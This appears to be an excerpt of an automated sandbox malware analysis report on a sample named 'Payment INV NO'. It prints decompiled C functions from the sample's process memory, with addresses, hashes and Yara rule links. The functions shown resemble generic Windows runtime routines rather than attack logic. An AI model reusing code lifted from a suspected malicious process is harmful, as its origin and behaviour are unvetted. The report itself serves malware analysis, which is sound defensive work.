                                                          • Instruction Fuzzy Hash: 2C018F32240A80DFE726871CC988F67BBECEB85750F0941A5FA19CBA91D728DC40C621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179A745 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 70%
                                                          			E0179A745(void* __ebx, signed char __ecx, void* __edx, void* __edi) {
				signed int _v12;
				void* __esi;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr* _t12;
				intOrPtr _t15;
				void* _t19;
				intOrPtr _t20;
				intOrPtr _t23;
				intOrPtr* _t28;
				intOrPtr _t30;
				intOrPtr _t32;
				signed char _t34;
				intOrPtr _t35;
				signed int _t37;

				_push(__ecx);
				_t7 =  *0x18884cc; // 0x0
				_t34 = __ecx;
				_t9 = E017B2280(_t7 + 0x18, _t7 + 0x18);
				asm("lock xadd [esi+0x14], eax");
				if((_t9 | 0xffffffff) == 1) {
					_t12 = _t34 + 8;
					_t30 =  *_t12;
					if( *((intOrPtr*)(_t30 + 4)) != _t12) {
						L7:
						asm("int 0x29");
						_t32 = 3;
						_pop(_t35);
						_pop(_t23);
						return E017DB640(0xc00000f0, _t23, _v12 ^ _t37, _t30, _t32, _t35);
					} else {
						_t28 =  *((intOrPtr*)(_t12 + 4));
						if( *_t28 != _t12) {
							goto L7;
						} else {
							_t15 =  *0x18884cc; // 0x0
							 *_t28 = _t30;
							 *((intOrPtr*)(_t30 + 4)) = _t28;
							E017AFFB0(__ebx, __edi, _t15 + 0x18);
							_t19 = E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t34);
							goto L2;
						}
					}
				} else {
					_t20 =  *0x18884cc; // 0x0
					_t19 = E017AFFB0(__ebx, __edi, _t20 + 0x18);
					L2:
					return _t19;
				}
			}


















                                                          0x0179a74a
                                                          0x0179a74b
                                                          0x0179a754
                                                          0x0179a757
                                                          0x0179a75f
                                                          0x0179a765
                                                          0x017f440f
                                                          0x017f4412
                                                          0x017f4417
                                                          0x017f4449
                                                          0x017f444c
                                                          0x0179a86a
                                                          0x0179a86b
                                                          0x0179a86e
                                                          0x0179a877
                                                          0x017f4419
                                                          0x017f4419
                                                          0x017f441e
                                                          0x00000000
                                                          0x017f4420
                                                          0x017f4420
                                                          0x017f4428
                                                          0x017f442b
                                                          0x017f442e
                                                          0x017f443f
                                                          0x00000000
                                                          0x017f443f
                                                          0x017f441e
                                                          0x0179a76b
                                                          0x0179a76b
                                                          0x0179a774
                                                          0x0179a779
                                                          0x0179a77d
                                                          0x0179a77d

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60d343bea701a558d5822fb4825d5ea0553c77c53dc8f9beec00076881df0ef5
                                                          • Instruction ID: 058f879b190d1e985679871aecdec81639179d7e992adfc2a29de59fc8ec65ed
                                                          • Opcode Fuzzy Hash: 60d343bea701a558d5822fb4825d5ea0553c77c53dc8f9beec00076881df0ef5
                                                          • Instruction Fuzzy Hash: C301A2721452029FC321AB2DEC44F6AF7ADEB42324F45826EE509CB396DA34D841CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179DB60 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				signed char _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0179DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0179E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							E0179E8B0(__ecx, _t14, 0xfff);
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                          0x0179db64
                                                          0x0179db66
                                                          0x0179db6b
                                                          0x0179dbaa
                                                          0x0179db71
                                                          0x0179db76
                                                          0x0179db7a
                                                          0x0179dba3
                                                          0x0179db7c
                                                          0x0179db87
                                                          0x0179db8b
                                                          0x017f4fa1
                                                          0x017f4fb3
                                                          0x017f4fb8
                                                          0x0179db91
                                                          0x0179db96
                                                          0x0179db98
                                                          0x0179db98
                                                          0x0179db8b
                                                          0x0179db7a
                                                          0x0179db9d
                                                          0x0179dba2

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd9153949962dd7df8a7c885005265d74fc17203d179bb234e1c7ea454090d7f
                                                          • Instruction ID: a6e9424348129a9e25172dd51ca495bd32c33a5512ae65d565f26dae6cb2541f
                                                          • Opcode Fuzzy Hash: fd9153949962dd7df8a7c885005265d74fc17203d179bb234e1c7ea454090d7f
                                                          • Instruction Fuzzy Hash: E0F09C332415639BDB335AD9D8D4F6BF6D69FD1A60F190075F2059B348CE608C0696D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179B1E1 Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179B1E1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char* _t13;
				void* _t22;
				void* _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E017B7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E017B7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return L01817016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                          0x0179b1e8
                                                          0x0179b1ea
                                                          0x0179b1f3
                                                          0x017f4a17
                                                          0x0179b1f9
                                                          0x0179b1f9
                                                          0x0179b1f9
                                                          0x0179b201
                                                          0x017f4a21
                                                          0x017f4a2e
                                                          0x00000000
                                                          0x00000000
                                                          0x017f4a3b
                                                          0x017f4a4d
                                                          0x017f4a3d
                                                          0x017f4a46
                                                          0x017f4a46
                                                          0x017f4a55
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0179b20a
                                                          0x0179b20a
                                                          0x0179b20a
                                                          0x0179b20a

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58d5a91a2d9a47a65f278e5b73a2d57f0ea8a8d1f4c21dc5d2f81cebfef52bb6
                                                          • Instruction ID: be7d0a194651da27950929c3fb533c6db9da8fec45bfe4ba12c454a1c401a52c
                                                          • Opcode Fuzzy Hash: 58d5a91a2d9a47a65f278e5b73a2d57f0ea8a8d1f4c21dc5d2f81cebfef52bb6
                                                          • Instruction Fuzzy Hash: 2101D1322046809BD722976DE848F6BFBA8EF91750F0800A5FA158B7B2D678C944C215
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01791480 Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E01791480(intOrPtr* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _t12;
				intOrPtr* _t18;
				intOrPtr _t23;
				signed char _t25;

				_v8 = __ecx;
				_t23 = __edx;
				_t12 = E0179187D(__edx, __ecx + 0xe, __ecx,  &_v12, 0,  &_v16,  &_v8);
				if(_t12 >= 0) {
					_t25 = _v8;
					if(_t25 != 0) {
						_t18 = _v12;
						if(_t18 != 0) {
							 *_t18 =  *_t25;
						}
						E017914DE(_t23, _t25);
						_t12 = E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25);
					}
					return _t12;
				}
				return _t12;
			}










                                                          0x0179148c
                                                          0x01791493
                                                          0x017914a2
                                                          0x017914a9
                                                          0x017914ac
                                                          0x017914b1
                                                          0x017914b3
                                                          0x017914b8
                                                          0x017914bc
                                                          0x017914bc
                                                          0x017914c2
                                                          0x017914d3
                                                          0x017914d3
                                                          0x00000000
                                                          0x017914d8
                                                          0x017914dd

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ac699e30519a2434e1e7e0bed1ab2adf8fd952ca757be905bca7ea3e7bbd193
                                                          • Instruction ID: 40cb33582f59f3f918dcc7d20d9f3b6963a6bf262b040386fc7543a8fcab5e40
                                                          • Opcode Fuzzy Hash: 6ac699e30519a2434e1e7e0bed1ab2adf8fd952ca757be905bca7ea3e7bbd193
                                                          • Instruction Fuzzy Hash: 10F0FF36B01109ABDF24DA48D940FFEFBBDDF88620F1401AAA905EB354DA30AE05C7D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01793591 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 70%
                                                          			E01793591(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t19;
				void* _t25;
				intOrPtr _t26;

				_t22 = __edx;
				_t20 = __ecx;
				if(__ecx == 0 || __edx == 0) {
					L7:
					L018688F5(_t19, _t20, _t22, _t25, _t26, __eflags);
					return 0xc000000d;
				}
				_t26 = _a4;
				if(_t26 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L7;
				}
				_push(0x1e);
				_v12 =  *((intOrPtr*)(_t26 + 0x28));
				_push(8);
				_push( &_v12);
				_v8 = __edx;
				_push( &_v20);
				_push(__ecx);
				_t16 = E017D9770();
				if(_t16 >= 0) {
					E017BF0AE(_t26, 1);
					return 0;
				}
				return _t16;
			}












                                                          0x01793591
                                                          0x01793591
                                                          0x0179359c
                                                          0x017935ea
                                                          0x017935ea
                                                          0x00000000
                                                          0x017935ef
                                                          0x017935a2
                                                          0x017935a7
                                                          0x00000000
                                                          0x00000000
                                                          0x017935bb
                                                          0x017935bd
                                                          0x017935c3
                                                          0x017935c5
                                                          0x017935c9
                                                          0x017935cc
                                                          0x017935cd
                                                          0x017935ce
                                                          0x017935d5
                                                          0x017935dc
                                                          0x00000000
                                                          0x017935e1
                                                          0x017935e7

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6e0febadd5fde40c3eeffad060a4314c3d5d20580ee8ab27703d0150818c60e
                                                          • Instruction ID: 9225fc6b7f042688aaee7a2b25f3c144f8cfd2fa74709dca233135ddae8fc4b1
                                                          • Opcode Fuzzy Hash: f6e0febadd5fde40c3eeffad060a4314c3d5d20580ee8ab27703d0150818c60e
                                                          • Instruction Fuzzy Hash: 32F0FC71A01309BBEF34EB799850FBAFBA8FF58710F148255DE06D7100DA31D9448791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C5AA0 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E017C5AA0(void* __ecx, intOrPtr _a4, char _a8) {
				void* __esi;
				void* __ebp;
				char* _t9;
				void* _t17;
				void* _t20;
				void* _t22;
				intOrPtr _t24;

				_t18 = __ecx;
				_push(__ecx);
				_t24 = _a4;
				if(_t24 == 0 || _a8 < 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					_t9 = L018688F5(_t17, _t18, _t20, _t22, _t24, __eflags);
				} else {
					_push(4);
					_push( &_a8);
					_push(5);
					_push( *((intOrPtr*)(_t24 + 0x24)));
					E017DAE70();
					if(E017B7D50() != 0) {
						_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t9 = 0x7ffe0386;
					}
					if( *_t9 != 0) {
						_t9 = L01868C14(_t24, _a8);
					}
				}
				return _t9;
			}










                                                          0x017c5aa0
                                                          0x017c5aa8
                                                          0x017c5aaa
                                                          0x017c5aaf
                                                          0x017c5af8
                                                          0x017c5ac6
                                                          0x017c5ac6
                                                          0x017c5acb
                                                          0x017c5acc
                                                          0x017c5ace
                                                          0x017c5ad1
                                                          0x017c5add
                                                          0x018071de
                                                          0x017c5ae3
                                                          0x017c5ae3
